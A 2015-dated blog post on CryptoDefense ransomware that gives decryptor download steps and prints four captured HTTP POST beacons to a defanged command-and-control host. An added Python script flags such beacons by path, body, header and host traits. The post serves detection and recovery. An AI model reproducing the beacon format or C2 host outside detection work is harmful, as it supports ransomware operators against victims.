CryptoDefense Ransomware PCAP Traffic Sample Malware – How to decrypt your files

By | August 23, 2015

Solution – Step 1 – Install this free trial of Kaspersky to remove the malware

Solution – Step 2

Don’t pay the ransom: there is a solution for CryptoDefense and CryptoLocker. The instructions below are from bleepingcomputer.com.

How to restore files encrypted by CryptoDefense using the Emsisoft Decryptor

If you were infected before April 1st, 2014 then you may have been infected with a variant that mistakenly left the private decryption key behind on the computer. To begin please download decrypt_cryptodefense.zip from the following URL and save it to your desktop.

http://tmp.emsisoft.com/fw/decrypt_cryptodefense.zip

Here is a sample of what the network traffic looks like (four HTTP POST beacons to the same host; the traffic sample was donated by one of our subscribers):

POST /dhcpshm1b8he4y HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 88
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)
Host: machetesraka[.]com
Cache-Control: no-cache

y=b235aj04825c514b4995676755202a2dc9ccb1dbe13d4e69035dsdg36473f9122eecdefe948c341ba718b1

POST /a9he8f4z2j332 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 88
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)
Host: machetesraka[.]com
Cache-Control: no-cache

z=a832jf842084b936eb1327f8eee774ca252373e9f93c44e7420f3909f2e569a0b772f033a904e8cc767b6c

POST /bwadw33tbbae2 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 88
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)
Host: machetesraka[.]com
Cache-Control: no-cache

w=ccc346456aef8320d4ab3c64e26b9e1576cf4289d05bbsdrr3452bbc16576045eaf5e8aa5aa5937452baj3

POST /3lt1ojfs8yz HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 88
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)
Host: machetesraka[.]com
Cache-Control: no-cache

z=eeeesf352aa235b2b1e5cd6dbad353213699923jbaej4e7643jfjseeb6d4860f51d24daf1144ffdc98456b
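The sample is useful to a defender mainly for its shape: every beacon is a POST to a single random-looking, extension-less path on the same host, carries exactly 88 bytes of body in the form of a one-letter key and a fixed-length hex-like blob, and sends Connection: Close with Cache-Control: no-cache. As an added example (not from the page or its contributor), the Python below parses captured HTTP requests and scores them against those traits. The host is the page's defanged value; the path and body regular expressions are an assumed generalisation of the four observed posts, the scoring threshold is a choice, and the benign search request used as a negative control is constructed.

```python
import re
from dataclasses import dataclass

# Indicators lifted from the captured traffic above. The host is the page's
# defanged value; PATH_RE and BODY_RE are an assumed generalisation of the four
# observed posts (one random alphanumeric path segment; a one-letter form key
# carrying an ~86-character hex-like blob); the threshold is an arbitrary choice.
KNOWN_C2_HOSTS = {"machetesraka.com"}
SAMPLE_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; "
             ".NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)")
PATH_RE = re.compile(r"^/[a-z0-9]{8,20}$")
BODY_RE = re.compile(r"^[a-z]=[0-9a-z]{80,90}$")
SUSPICION_THRESHOLD = 3


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict
    body: str


def refang(host: str) -> str:
    """Turn a defanged host such as example[.]com back into a comparable name."""
    return host.replace("[.]", ".").lower()


def parse_request(raw: str) -> HttpRequest:
    """Split a captured plain-text HTTP request into request line, headers and body."""
    text = raw.replace("\r\n", "\n").strip("\n")
    head, _, body = text.partition("\n\n")
    request_line, *header_lines = head.splitlines()
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body.strip())


def c2_indicators(req: HttpRequest) -> list:
    """Return the names of the beacon traits this request exhibits."""
    hits = []
    if req.method == "POST" and PATH_RE.match(req.path):
        hits.append("random-path")
    if BODY_RE.match(req.body):
        hits.append("single-key-blob")
    if refang(req.headers.get("host", "")) in KNOWN_C2_HOSTS:
        hits.append("known-c2-host")
    if req.headers.get("user-agent", "") == SAMPLE_UA:
        hits.append("sample-user-agent")
    if (req.headers.get("connection", "").lower() == "close"
            and req.headers.get("cache-control", "").lower() == "no-cache"):
        hits.append("close-no-cache")
    return hits


def is_c2_beacon(raw: str) -> bool:
    """True when a raw request matches at least SUSPICION_THRESHOLD traits."""
    return len(c2_indicators(parse_request(raw))) >= SUSPICION_THRESHOLD


def scan(requests) -> list:
    """Return (path, indicators) for every request at or above the threshold."""
    flagged = []
    for raw in requests:
        req = parse_request(raw)
        hits = c2_indicators(req)
        if len(hits) >= SUSPICION_THRESHOLD:
            flagged.append((req.path, hits))
    return flagged


def _page_post(path: str, body: str) -> str:
    """Rebuild one of the page's captured POSTs; headers are identical across all four."""
    return (
        f"POST {path} HTTP/1.1\r\nAccept: */*\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\nConnection: Close\r\n"
        f"Content-Length: {len(body)}\r\nUser-Agent: {SAMPLE_UA}\r\n"
        "Host: machetesraka[.]com\r\nCache-Control: no-cache\r\n\r\n" + body
    )


# Constructed benign form post used as a negative control (not from the page).
BENIGN_POST = (
    "POST /search HTTP/1.1\r\nAccept: text/html\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive\r\n"
    "Content-Length: 22\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Host: intranet.example.com\r\n\r\nq=firewall+logs&page=2"
)

# The four beacons reproduced from the page's sample, plus the control.
SAMPLE_REQUESTS = [
    _page_post("/dhcpshm1b8he4y", "y=b235aj04825c514b4995676755202a2dc9ccb1dbe13d4e69035dsdg36473f9122eecdefe948c341ba718b1"),
    _page_post("/a9he8f4z2j332", "z=a832jf842084b936eb1327f8eee774ca252373e9f93c44e7420f3909f2e569a0b772f033a904e8cc767b6c"),
    _page_post("/bwadw33tbbae2", "w=ccc346456aef8320d4ab3c64e26b9e1576cf4289d05bbsdrr3452bbc16576045eaf5e8aa5aa5937452baj3"),
    _page_post("/3lt1ojfs8yz", "z=eeeesf352aa235b2b1e5cd6dbad353213699923jbaej4e7643jfjseeb6d4860f51d24daf1144ffdc98456b"),
    BENIGN_POST,
]

if __name__ == "__main__":
    for path, hits in scan(SAMPLE_REQUESTS):
        print(f"{path}: {', '.join(hits)}")
```

The known-host check is the weakest trait because the domain rotates between campaigns; the threshold of three is set so that the structural traits (path shape, body shape, header pair) still flag a beacon to a host that has never been seen before, while an ordinary form submission like the control matches none of them.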
